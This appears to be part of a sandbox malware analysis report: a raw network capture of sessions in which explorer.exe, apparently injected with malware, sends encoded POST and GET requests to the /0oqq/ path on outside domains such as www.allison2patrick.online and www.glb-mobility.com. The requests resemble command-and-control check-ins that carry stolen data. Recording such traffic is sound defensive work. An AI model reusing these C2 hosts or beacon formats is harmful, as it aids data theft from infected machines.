                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 7a 6d 74 53 34 7a 6f 6f 4f 72 6e 75 48 42 75 66 70 58 52 69 44 6d 33 54 58 62 7e 73 43 46 73 65 57 57 50 4c 34 33 62 62 28 61 38 74 70 54 50 32 35 37 4a 79 45 44 53 36 77 54 50 6b 68 4c 62 57 64 68 41 4c 53 47 54 69 79 63 4a 4a 36 61 47 70 34 68 62 4b 5a 67 30 35 57 33 77 2d 4a 54 53 72 4e 4c 35 70 32 78 53 71 38 52 51 6f 41 62 79 4b 4a 53 70 4c 6a 48 36 49 6f 41 36 72 61 6b 41 39 6d 7a 65 4a 53 51 6e 54 48 42 78 37 69 58 51 34 7e 72 4e 30 68 43 33 42 41 37 32 72 73 62 6c 70 30 68 36 6d 68 68 6d 70 7a 53 56 4b 7e 6a 49 72 68 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=zmtS4zooOrnuHBufpXRiDm3TXb~sCFseWWPL43bb(a8tpTP257JyEDS6wTPkhLbWdhALSGTiycJJ6aGp4hbKZg05W3w-JTSrNL5p2xSq8RQoAbyKJSpLjH6IoA6rakA9mzeJSQnTHBx7iXQ4~rN0hC3BA72rsblp0h6mhhmpzSVK~jIrhQ).
                                                                                                                      Mar 20, 2023 09:10:25.888029099 CET287INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:25 GMT
                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                                                      X-Powered-By: PHP/7.1.33
                                                                                                                      Content-Length: 195
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      23192.168.2.34972262.4.21.19080C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:28.413872004 CET293OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.allison2patrick.online
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.allison2patrick.online
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.allison2patrick.online/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 7a 6d 74 53 34 7a 6f 6f 4f 72 6e 75 46 67 65 66 73 32 52 69 53 57 33 63 62 37 7e 73 49 6c 73 46 57 57 7a 4c 34 32 65 41 28 6f 51 74 70 45 4c 32 35 5a 68 79 49 6a 53 36 6e 6a 4f 73 6c 4c 62 36 64 68 6c 36 53 47 6a 79 79 66 6c 4a 37 49 4f 70 7e 78 62 56 52 67 30 36 62 58 77 39 55 6a 53 72 4e 4c 31 50 32 30 7e 63 38 52 34 6f 41 4b 53 4b 4a 55 46 45 69 58 36 4c 6e 67 36 72 61 6b 38 2d 6d 7a 65 7a 53 51 4f 65 48 41 52 37 77 56 59 34 74 71 4e 33 6e 53 33 34 4b 62 33 61 6a 4a 34 53 68 78 75 65 79 54 75 4b 37 58 59 37 39 52 59 6e 31 56 75 4f 73 6b 58 47 36 32 42 6a 6a 32 67 55 44 61 28 7a 38 4b 4a 79 36 36 53 49 47 66 31 68 37 70 42 6d 44 72 73 51 55 69 52 69 6f 74 5a 67 4b 65 36 47 64 41 42 66 45 7a 33 4a 37 53 76 7a 4e 69 70 51 71 46 37 6a 78 51 4b 51 70 4a 67 7a 6b 57 4d 54 34 6c 55 49 37 59 69 44 6d 46 77 52 36 61 6a 76 30 78 4d 49 69 45 72 78 69 70 47 65 37 31 58 52 59 4a 6f 4d 6e 4a 36 66 76 6c 51 6d 61 51 47 4e 45 37 69 72 44 4a 49 7a 46 37 79 44 55 6f 49 66 47 64 7a 6f 64 6f 50 68 6c 48 4c 62 44 44 42 47 56 75 35 6c 37 51 6e 6c 37 57 36 68 31 6e 6f 70 44 4e 71 49 31 7a 74 56 79 56 44 6e 48 52 46 4a 79 47 69 59 4d 61 58 62 50 53 65 47 30 65 59 56 28 73 73 30 36 47 65 39 70 54 36 6c 57 73 61 6d 43 44 45 74 49 36 57 49 42 46 4b 72 54 63 61 54 51 36 51 5a 6c 30 51 64 36 7a 28 2d 38 4f 58 46 63 7a 43 59 7e 33 49 33 6c 41 54 67 67 78 51 6f 79 61 6c 77 35 36 6c 6e 74 68 72 6c 68 50 44 31 56 68 4f 34 7e 74 7e 50 6b 4d 5a 34 50 37 72 66 51 67 51 6f 72 59 75 58 4b 6f 7e 71 66 2d 39 46 35 45 46 4c 31 73 59 43 66 69 6d 70 6b 6a 4a 41 63 48 4e 75 6c 33 66 61 39 6f 59 4d 6b 44 71 39 4a 47 55 78 52 2d 48 76 47 4c 37 32 4b 38 31 55 65 70 4f 31 5a 59 36 2d 37 6b 64 2d 35 52 37 78 7e 64 75 47 73 59 63 75 54 45 37 49 43 35 76 75 6e 42 37 49 4c 39 52 36 58 77 6f 71 28 67 46 73 63 39 69 74 41 62 6c 38 53 78 56 53 32 6f 66 58 4b 41 69 32 47 59 79 35 67 47 59 74 30 66 70 4e 32 75 51 45 79 5f 75 2d 64 55 71 6c 7a 34 6c 55 31 67 72 32 4b 75 38 73 66 67 62 41 6c 6a 70 67 58 54 30 67 59 77 34 48 78 7a 78 67 57 5f 39 4a 36 51 37 5f 46 5f 74 69 6d 52 4e 6c 6e 30 78 6a 35 75 31 33 37 38 70 51 72 78 71 79 38 79 55 7a 33 4f 6c 47 44 43 45 6b 31 65 4f 74 58 45 67 4d 42 5f 66 55 44 5f 73 32 75 41 54 66 46 52 76 6d 78 7a 61 66 50 46 41 59 67 69 6e 35 34 54 28 37 49 47 6f 30 37 70 4c 66 44 74 79 59 32 64 35 65 6e 4a 28 64 6b 31 62 53 70 45 4b 33 6f 68 7e 4d 6d 65 43 5f 54 46 78 76 32 53 78 73 35 4b 66 32 4e 68 46 75 74 6e 76 44 57 5a 53 58 74 65 56 4a 50 37 35 79 34 6f 68 31 59 34 4f 69 6b 52 65 2d 44 70 65 70 6a 5f 70 77 67 77 41 4d 44 76 28 69 37 53 41 43 31 30 74 42 36 69 55 65 71 39 37 70 65 73 33 6a 48 58 64 73 73 6c 47 63 31 56 47 51 72 54 43 6b 47 32 73 62 37 47 36 6d 5a 6b 38 64 53 65 52 33 32 46 79 72 64 6c 66 43 4e 4d 4a 58 78 6c 44 55 41 51 4d 68 70 46 47 6b 78 58 36 48 4c 4d 68 44 63 4c 70 4b 64 46 6e 66 55 30 68 70 6b 31 5a 5f 4c 5a 77 4c 34 49 6e 73 34 53 76 58 6d 41 4d 41 72 6f 37 47 6d 67 42 55 47 42 45 50 72 70 4a 2d 4d 2d 66 54 32 32 7a 4e 50 6a 4b 59 39 67 78 71 6d 54 76 4b 28 4c 51 73 33 75 72 64 45 6e 6e 39 38 36 36 46 79 50 4f 55 65 32 46 5a 36 2d 73 43 65 31 7a 35 28 32 30 42 72 45 69 37 42 44 64 47 70 43 63 73 54 36 34 68 73 31 62 62 33 77 77 73 36 31 6f 6b 38 33 78 68 54 6b 4c 44 65 41 48 43 6e 38 6a 39 58 37 38 71 37 6a 79 6e 32 4f 6f 38 43 5a 31 4c 38 76 35 58 43 72 6e 77 57 34 78 66 70 5f 44 33 74 63 30 49 7a 6b 46 58 42 39 56 37 28 32 44 75 43 71 67 44 5a 77 51 6d 47 62 7e 63 7a 45 69 41 32 61 59 61 69 5f 57 71 41 54 34 43 54 5a 6b 6a 79 4b 72 56 34 4c 6e 31 63 6f 71 51 71 71 69 73 7e 66 7a 4c 71 49 53 75 49 73 41 44 66 54 4d 71 44 6c 43 65 63 53 58 45 4c 69 63 39 64 45 52 32 55 65 33 49 32 42 4a 6b 57 63 61 64 73 76 64 2d 61 76 44 63 42 43 35 4b 72 2d 41 6c 73 51 66 36 31 59 58 4d 74 72 71 56 34 4c 44 6b 48 34 7a 34 56 4e 30 43 35 78 55 31 69 66 7e 61 4e 59 4f 78 65 77 59 54 66 74 79 7a 44 49 4d 70 64 2d 4c 52 44 44 41 6d 64 48 36 76 72 59 49 4e 75 57 30 71 35 37 37 71 30 35 63 49 79 51 31 36 48 53 54 47 78 4b 70 49 31 42 57 59 37 6b 61 35 43 77 33 45 45 78 4b 7a 6b 6b 70 35 58 77 55 45 4d 75 47
                                                                                                                      Data Ascii: ICHyvj5=zmtS4zooOrnuFgefs2RiSW3cb7~sIlsFWWzL42eA(oQtpEL25ZhyIjS6njOslLb6dhl6SGjyyflJ7IOp~xbVRg06bXw9UjSrNL1P20~c8R4oAKSKJUFEiX6Lng6rak8-mzezSQOeHAR7wVY4tqN3nS34Kb3ajJ4ShxueyTuK7XY79RYn1VuOskXG62Bjj2gUDa(z8KJy66SIGf1h7pBmDrsQUiRiotZgKe6GdABfEz3J7SvzNipQqF7jxQKQpJgzkWMT4lUI7YiDmFwR6ajv0xMIiErxipGe71XRYJoMnJ6fvlQmaQGNE7irDJIzF7yDUoIfGdzodoPhlHLbDDBGVu5l7Qnl7W6h1nopDNqI1ztVyVDnHRFJyGiYMaXbPSeG0eYV(ss06Ge9pT6lWsamCDEtI6WIBFKrTcaTQ6QZl0Qd6z(-8OXFczCY~3I3lATggxQoyalw56lnthrlhPD1VhO4~t~PkMZ4P7rfQgQorYuXKo~qf-9F5EFL1sYCfimpkjJAcHNul3fa9oYMkDq9JGUxR-HvGL72K81UepO1ZY6-7kd-5R7x~duGsYcuTE7IC5vunB7IL9R6Xwoq(gFsc9itAbl8SxVS2ofXKAi2GYy5gGYt0fpN2uQEy_u-dUqlz4lU1gr2Ku8sfgbAljpgXT0gYw4HxzxgW_9J6Q7_F_timRNln0xj5u1378pQrxqy8yUz3OlGDCEk1eOtXEgMB_fUD_s2uATfFRvmxzafPFAYgin54T(7IGo07pLfDtyY2d5enJ(dk1bSpEK3oh~MmeC_TFxv2Sxs5Kf2NhFutnvDWZSXteVJP75y4oh1Y4OikRe-Dpepj_pwgwAMDv(i7SAC10tB6iUeq97pes3jHXdsslGc1VGQrTCkG2sb7G6mZk8dSeR32FyrdlfCNMJXxlDUAQMhpFGkxX6HLMhDcLpKdFnfU0hpk1Z_LZwL4Ins4SvXmAMAro7GmgBUGBEPrpJ-M-fT22zNPjKY9gxqmTvK(LQs3urdEnn9866FyPOUe2FZ6-sCe1z5(20BrEi7BDdGpCcsT64hs1bb3wws61ok83xhTkLDeAHCn8j9X78q7jyn2Oo8CZ1L8v5XCrnwW4xfp_D3tc0IzkFXB9V7(2DuCqgDZwQmGb~czEiA2aYai_WqAT4CTZkjyKrV4Ln1coqQqqis~fzLqISuIsADfTMqDlCecSXELic9dER2Ue3I2BJkWcadsvd-avDcBC5Kr-AlsQf61YXMtrqV4LDkH4z4VN0C5xU1if~aNYOxewYTftyzDIMpd-LRDDAmdH6vrYINuW0q577q05cIyQ16HSTGxKpI1BWY7ka5Cw3EExKzkkp5XwUEMuG6bhc7VXOhsyL-TDY9PUgZV34GAahY5Q1LWq(awKrpzn3nyQqm24fRC1XaVRvaAuiIjDvUbh4veggjErhuvo4zy_RbQs5ul8Jd~Pd6B5wYogEDHM6eWwdKG_zYJfe-tqciR4YHBXTtyPNICF1UwKKX5FoduS2L7zBMl1J4cgz-gB3XvG3X9RhTKTWSpSYDparG8nGiwhxKsaEWR8qlppgCYb3smc9XdeyBJoCfARU7OR1VPaSGssuTTElxUpfOQS7_4-fMlok7jzQM6v0yydEXwacC32jTxyc2tCwvjsk7MQBcfWS-yYNDHYFj40rldrvR9L1mjA5pqZVtz3iCU6hK4xT9XxoVNWSnYXksMQgajzmIEDhFI2thzOLDLwJAIXt5YGyrUhNSgH1rbC8iY6gBeihC(d6SzrScFYMVfhy3coy-KfZVPBdBJS2_JmYFa-Fs53U04jaxo3sUx5RGwSX_McD5q7jaBfaqxguapWahmNpGt8(ZoMVAjM1DrC69(B~EjQpm16bxGwFUpJrAQB8JtL5XEm3KjimYj7uC(zBeULFdFJPOKOD776ERc5(XfIgipK7y27Tm6kOm6wHLvQJZJPfMdiw3AGi7kAn73_kYnK5-Yv(V6S3YIleOh81TXt9_XJ60RDBx9jkWUHI_ku1xKC0f0dxC~8RJJA4shNmv48ULUkWIwLqxRSoUNl5noUTXDyslruaumslLasW5DNZNmCurRdnmYK7gnXvFe0hWfN87qAwapkIbirDJMMm9uB7WxgQPGyHuL_woR3rH2MJM~wcivyd9b-n2~Jm80Bc_xcROSdPqNCXafqekpIX5L-0DRFbsWS24FWkQk2CyaOzle8IpvVNLynDxvhilOLxyqf9zOqVn5DUQeQHiolv_CLdMVTn3vb7a9Un5JMCmFmcpk9Ek(sIhqhuaF-pfSJBJCbqenm9ADpxtMzYxMTh5hpzhiBexQN4hNXkcQZJa0Q2wJywl1qy52mnKAFvokG8ggcskAZrG4MbecpUWHBa6eToU5pHNU8FcuYTHES~0p0FbOuj8lX1261ZNncn5S31q12ClJl0eP6Ncgte0zAH2f-nmMW~dyTiKuizd6g6w62VN5tW-Ska8tn6wgSJpxzzko-Gq4YG-wk6QUNLs3aEdY0Z_lO85dlUXK7yGPVZjOvgUfLEuzWIx2Fg-iSk53jArngYHkzUEvxS2rztW4Sd4Jcew99N_o3KB8hWE4kaiwsn_9_kqXpAZo1XzhMogD1~JGPV1owLCDgBUMDNyrQFFPxqeoIHc8snNRm3CceGdpkdTt_DAO8BLsG7d7oo3teKhJtZHTFw5KDesl05I8cAzFP8cOTvEuKQeQFHFWqCuG_vW6QCt1h2NNzpeEx9OXncGT1fX8VrrMLa3AQV8KqybhZR5~uZR4DMf0J0SOGabYzp6aE9TmKdsWtjuFKU0zsQQ6dcFlL2rEAiKAc7oh9a0Yc5WAZgaPJRgGIoOQpvUCxCIfGpywJ2YhwhbQtZLNvu3sRzN3_bqdJ1HdChg4U2VPvujsuVULtQkd2JUEwA5~n2rf_Zq1O1y4lcyszQ4SH644ZK427jAMq0SWGwBf2xGDGvsGrdm2tG7t4wg(_crmA9hcYlLNCrmRM8ZZO38yb550K~1Z4Hrec17GJI-vRL44kxZ1hgr2aqG9xNz40qBCp2dZb2_vdrmDcFaTNlVXYBA45pBtz86sPohpQLMFc74kmfQgn8t(E4AsnZU7MMwiZzFzrKXo2qODgnpZFg1YOIK1zISfyu9AnABm_JANGGtqEStdwJ8kwC8REXuLGB80Pi5iapQK7yERKKIRwT3za(kMG4O7E6gdG3osnN3y7V4qBZWgvOR3W1_UJP2FylfvXpPZdgVYATLKH0TAG0lXyPsquZbTiCfcvu6xc7HMtUbN9FBfQdSA0zS2sL8(-fo1K1v3X8OJmAiMU3ZKGw1tB2Xl2STOMFq8Ix106nnzUWgDFMxnR356egQuSpzhyYZqDM3LGqsEqWLx8niUPuKb_8rZgCULPh6MFOrp-r2vR5r6_ROCulvKr8zmtIR9evUfpuM02MGqvWSGriA7fMsBK9JZrn3WMBKyM4yzyosFf1u8qRlE5HsFRUmLJtXE_fQvoMhYIL57Du0(5tNOQy_V82dpISKZO9qOGVMopTuJLry(6sTKCS7GjX2dBKkCqwTGCjetVP6cVF3vy6HUvBWV-tQoa6AvT7KcXfsvfyJufZRtKt4qXmw(90nb9HU6jrt98JiYoFgmmgy3HEMaTJ2PsF9vha4CkCPUoYIP1(fVlEutvZB5lk0TfHhG3DoREUVht1Gp7vUuxhXv9uQUIbbvyn4o0cR~yKMtBe-JwtjjCX9C2ah2jGtRBe_lElA9mRxreP8KU6nkWeVxU(weNns7xTIBAGRm8H1nisVXsiULuRTPFUP2esJA1rQoAfAa020xYHz83GOp8OqWLQoGbN3iFeayaiKVC0CzhLo~0~e(a0CrqKATVMyJXO6zq3c6I(Y6kgzRHS5aQn2M2vZbPUrs6Te4st_kUBe0jC4Xlh_RWGR9GjZaXyvJiHTMwc2To0y9P22r9pnPqQKRKcbRRhykEsgzqah0Oqh(YA7UCN1U_O3(GL4XGMm1BzFipSeJPZz5RjPNspgnBtgellRsCEZ7yUD3Ey3rNekvnai9YBTmlHJcSDZpwwQuCXexfMSdnAVRrE_pmuq6bhhBnCle_
                                                                                                                      Mar 20, 2023 09:10:28.442352057 CET294INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:28 GMT
                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                                                      X-Powered-By: PHP/7.1.33
                                                                                                                      Content-Length: 195
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      24192.168.2.34972362.4.21.19080C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:30.965842009 CET294OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1
                                                                                                                      Host: www.allison2patrick.online
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:10:30.994362116 CET295INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:30 GMT
                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                                                                                      X-Powered-By: PHP/7.1.33
                                                                                                                      Content-Length: 195
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 63 6c 75 64 65 73 28 22 23 22 29 29 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 5c 2f 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5c 23 2f 67 2c 27 23 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 23 2f 67 2c 27 2f 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 70 72 65 3e 43 6f 75 6c 64 20 6e 6f 74 20 70 61 72 73 65 20 75 72 6c 20 21 3c 2f 70 72 65 3e
                                                                                                                      Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      25192.168.2.34972488.99.217.19780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:36.097382069 CET296OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.glb-mobility.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.glb-mobility.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.glb-mobility.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 47 32 4f 79 65 6d 51 5a 6c 4c 73 65 67 78 6d 69 51 2d 58 34 48 53 32 61 4b 66 59 67 38 69 7a 47 46 78 34 35 65 35 30 4b 68 42 34 39 28 5f 72 4b 58 6e 52 69 59 6e 6a 6f 47 44 6b 47 50 52 7e 49 4f 4a 38 71 52 61 72 63 63 78 28 36 33 45 6f 62 63 6b 75 47 49 42 59 4f 64 6c 66 69 6f 47 77 5a 68 48 75 78 62 57 6f 42 72 6a 50 56 65 4a 6d 79 36 41 6f 55 57 66 5a 4d 6c 6f 46 6c 47 53 67 44 49 52 50 53 4c 32 6a 4d 75 6f 44 62 7a 76 66 5f 61 4b 50 4b 4d 33 69 76 42 46 76 5a 48 75 70 67 74 30 54 66 61 6f 76 78 70 48 68 4b 77 54 75 57 6e 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=G2OyemQZlLsegxmiQ-X4HS2aKfYg8izGFx45e50KhB49(_rKXnRiYnjoGDkGPR~IOJ8qRarccx(63EobckuGIBYOdlfioGwZhHuxbWoBrjPVeJmy6AoUWfZMloFlGSgDIRPSL2jMuoDbzvf_aKPKM3ivBFvZHupgt0TfaovxpHhKwTuWnQ).
                                                                                                                      Mar 20, 2023 09:10:36.126157999 CET297INHTTP/1.1 404 Not Found
                                                                                                                      Date: Mon, 20 Mar 2023 08:10:36 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      26192.168.2.34972588.99.217.19780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:10:38.646538973 CET303OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.glb-mobility.com
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.glb-mobility.com
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.glb-mobility.com/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 47 32 4f 79 65 6d 51 5a 6c 4c 73 65 79 69 7e 69 58 65 72 34 57 79 32 5a 46 5f 59 67 70 79 7a 43 46 78 6b 35 65 34 78 4e 68 33 41 39 28 75 37 4b 51 42 4e 69 65 6e 6a 6f 41 44 6b 43 53 42 7e 65 4f 4a 6f 6d 52 59 79 70 63 30 48 36 33 52 6b 62 63 45 75 46 55 52 59 4c 4a 46 66 68 73 47 77 5a 68 48 79 4c 62 58 70 36 72 6a 33 56 65 36 75 79 36 43 77 58 55 50 5a 4e 36 59 46 6c 47 53 6b 49 49 52 4f 76 4c 33 4c 63 75 72 62 62 7a 38 48 5f 63 62 50 4e 50 6e 69 6f 4c 6c 75 42 50 66 41 72 68 6e 4f 74 64 65 50 61 75 32 67 31 35 6e 6a 37 39 69 44 52 78 65 39 4b 6b 39 53 38 46 70 6b 68 45 74 42 47 58 78 55 37 36 48 48 5f 39 5f 45 70 50 6c 30 76 28 73 36 73 59 59 34 7a 37 4d 6d 79 70 41 46 5f 35 42 30 35 47 6e 39 72 36 4e 66 4b 4a 33 55 4a 53 33 44 67 49 4b 70 71 52 62 38 32 6e 42 38 67 66 36 46 61 39 32 6d 4d 38 64 68 62 6a 6b 38 52 58 64 79 31 6d 52 4b 63 53 30 41 37 54 66 46 7a 77 75 57 6f 6b 78 53 76 4b 65 35 65 7a 37 31 53 31 43 45 57 58 4c 69 73 62 45 61 39 61 62 4e 6b 34 41 51 4c 4b 68 7a 50 57 5a 47 53 77 64 7a 32 6b 65 45 44 7e 61 5a 37 54 56 47 67 37 66 53 65 69 49 6f 72 4f 74 48 49 28 2d 4d 72 51 43 46 32 43 53 6c 49 4b 77 59 44 28 66 5a 6d 64 73 61 37 67 6a 70 4f 42 37 38 64 53 69 47 35 4d 4e 62 51 6f 64 54 51 30 6d 6c 52 38 44 31 6d 5a 63 42 54 49 72 69 4b 79 41 57 4d 45 76 41 71 51 48 66 33 67 59 31 78 6b 52 31 50 74 5a 4d 49 74 34 59 5f 6f 34 56 38 73 57 7a 67 47 4b 70 38 32 4b 6f 71 67 5a 62 43 42 38 4d 79 41 71 77 51 71 33 32 64 66 49 6b 6a 4d 44 66 6a 54 50 44 55 30 4d 79 5f 44 36 59 48 4c 41 38 44 34 62 38 2d 67 2d 51 55 69 4f 59 35 50 66 49 76 6e 53 53 6a 6b 47 28 61 4a 4e 44 38 65 38 49 58 61 4a 32 72 47 78 79 4f 32 71 4f 77 73 68 78 6b 56 6f 6c 41 32 72 50 43 77 53 38 39 4a 77 45 37 37 63 35 4d 72 71 57 65 52 6b 42 4b 66 6c 79 4f 4c 5f 71 7a 74 74 70 6c 46 51 6c 31 48 78 42 34 61 62 63 6e 74 75 47 6b 28 74 50 42 67 62 4c 52 43 65 6e 76 7a 69 41 42 79 4b 35 54 44 58 6a 36 38 4c 71 7a 53 39 73 4e 39 53 59 73 69 77 46 47 38 66 7e 58 35 51 32 71 6a 6d 7a 72 77 31 42 71 4a 42 56 76 74 32 4f 41 4f 36 69 47 68 4c 76 41 36 35 34 6f 4e 45 50 75 56 32 75 69 59 51 45 52 70 63 39 79 6a 78 41 68 48 49 4b 4d 73 74 42 38 72 66 4a 34 28 6f 42 4b 48 37 4c 6c 52 4f 43 